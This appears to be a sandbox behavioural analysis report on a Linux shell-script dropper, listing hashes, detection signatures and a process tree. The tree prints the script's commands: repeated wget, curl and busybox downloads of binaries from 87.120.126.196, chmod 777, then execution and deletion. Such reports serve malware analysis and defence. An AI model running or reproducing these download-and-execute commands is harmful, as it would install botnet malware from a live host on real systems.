Analysis
-
max time kernel
28s -
max time network
132s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:17
Static task
static1
Behavioral task
behavioral1
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh
-
Size
10KB
-
MD5
5162438af338945d51bf275a08c71d1b
-
SHA1
08afc256b7a2d67ce5d019cf6633b8ac69ecf749
-
SHA256
2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760
-
SHA512
f106888effaf28760884756fafc0f9eaa435bcca7312c118cd9de9e6247c65cbc3568f3483e66eb553e80c73a4279c99136513d3500b4b2bef751dc2d1839d32
-
SSDEEP
96:XNhHXJX740n2TT9740rA10KKNDcgQ9Jok:XNhHXJ740n2h40X10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1632 chmod 1668 chmod 1674 chmod 1527 chmod 1551 chmod 1569 chmod 1581 chmod 1599 chmod 1620 chmod 1515 chmod 1533 chmod 1557 chmod 1563 chmod 1656 chmod 1575 chmod 1605 chmod 1539 chmod 1614 chmod 1626 chmod 1680 chmod 1521 chmod 1545 chmod 1650 chmod 1662 chmod 1593 chmod 1638 chmod 1644 chmod 1587 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC 1516 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe 1522 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 1528 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 1534 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl 1540 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV 1546 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr 1552 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr 1558 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC 1564 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm 1570 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff 1576 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp 1582 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV 1588 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad 1594 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad 1600 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff 1606 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp 1615 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV 1621 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 1627 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl 1633 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV 1639 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC 1645 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe 1651 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 1657 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr 1663 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm 1669 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr 1675 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC 1681 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1525 curl 1526 busybox 1528 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB 1653 wget 1658 rm 1524 wget 1529 rm 1654 curl 1655 busybox 1657 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe curl File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp curl File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB curl File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC curl File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV curl File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff curl File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 curl File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV curl File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC curl File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad curl File opened for modification /tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff curl File opened for modification /tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp curl File opened for modification /tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV curl File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl curl File opened for modification /tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl curl File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr curl File opened for modification /tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad curl File opened for modification /tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr curl File opened for modification /tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3 curl File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr curl File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm curl File opened for modification /tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV curl File opened for modification /tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC curl File opened for modification /tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe curl File opened for modification /tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC curl File opened for modification /tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB curl File opened for modification /tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm curl File opened for modification /tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr curl
Processes
-
/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh/tmp/2100317beeaace5a46e14c17593a94ff209c3b76f3d27dab340222562ec6e760.sh1⤵PID:1507
-
/bin/rm/bin/rm bins.sh2⤵PID:1508
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:1509
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:1514
-
-
/bin/chmodchmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- File and Directory Permissions Modification
PID:1515
-
-
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Executes dropped EXE
PID:1516
-
-
/bin/rmrm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:1517
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:1518
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Writes file to tmp directory
PID:1519
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:1520
-
-
/bin/chmodchmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- File and Directory Permissions Modification
PID:1521
-
-
/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵
- Executes dropped EXE
PID:1522
-
-
/bin/rmrm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe2⤵PID:1523
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:1524
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1525
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:1526
-
-
/bin/chmodchmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- File and Directory Permissions Modification
PID:1527
-
-
/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1528
-
-
/bin/rmrm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB2⤵
- System Network Configuration Discovery
PID:1529
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:1530
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Writes file to tmp directory
PID:1531
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:1532
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:1533
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:1534
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:1535
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:1536
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Writes file to tmp directory
PID:1537
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:1538
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:1539
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:1540
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:1541
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:1542
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:1544
-
-
/bin/chmodchmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- File and Directory Permissions Modification
PID:1545
-
-
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Executes dropped EXE
PID:1546
-
-
/bin/rmrm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:1547
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:1548
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Writes file to tmp directory
PID:1549
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:1550
-
-
/bin/chmodchmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- File and Directory Permissions Modification
PID:1551
-
-
/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵
- Executes dropped EXE
PID:1552
-
-
/bin/rmrm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr2⤵PID:1553
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:1554
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Writes file to tmp directory
PID:1555
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:1556
-
-
/bin/chmodchmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- File and Directory Permissions Modification
PID:1557
-
-
/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵
- Executes dropped EXE
PID:1558
-
-
/bin/rmrm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr2⤵PID:1559
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:1560
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Writes file to tmp directory
PID:1561
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:1562
-
-
/bin/chmodchmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- File and Directory Permissions Modification
PID:1563
-
-
/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵
- Executes dropped EXE
PID:1564
-
-
/bin/rmrm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC2⤵PID:1565
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:1566
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Writes file to tmp directory
PID:1567
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:1568
-
-
/bin/chmodchmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- File and Directory Permissions Modification
PID:1569
-
-
/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵
- Executes dropped EXE
PID:1570
-
-
/bin/rmrm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm2⤵PID:1571
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:1572
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Writes file to tmp directory
PID:1573
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:1574
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:1575
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:1576
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:1577
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:1578
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Writes file to tmp directory
PID:1579
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:1580
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:1581
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:1582
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:1583
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:1584
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Writes file to tmp directory
PID:1585
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:1586
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:1587
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:1588
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:1589
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:1590
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:1592
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:1594
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:1595
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:1596
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Writes file to tmp directory
PID:1597
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:1598
-
-
/bin/chmodchmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- File and Directory Permissions Modification
PID:1599
-
-
/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵
- Executes dropped EXE
PID:1600
-
-
/bin/rmrm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad2⤵PID:1601
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:1602
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Writes file to tmp directory
PID:1603
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:1604
-
-
/bin/chmodchmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- File and Directory Permissions Modification
PID:1605
-
-
/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵
- Executes dropped EXE
PID:1606
-
-
/bin/rmrm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff2⤵PID:1607
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:1608
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:1613
-
-
/bin/chmodchmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp2⤵PID:1616
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:1619
-
-
/bin/chmodchmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV2⤵PID:1622
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:1623
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:1625
-
-
/bin/chmodchmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N32⤵PID:1628
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:1631
-
-
/bin/chmodchmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl2⤵PID:1634
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:1635
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:1637
-
-
/bin/chmodchmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV2⤵PID:1640
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:1643
-
-
/bin/chmodchmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC2⤵PID:1646
-
-
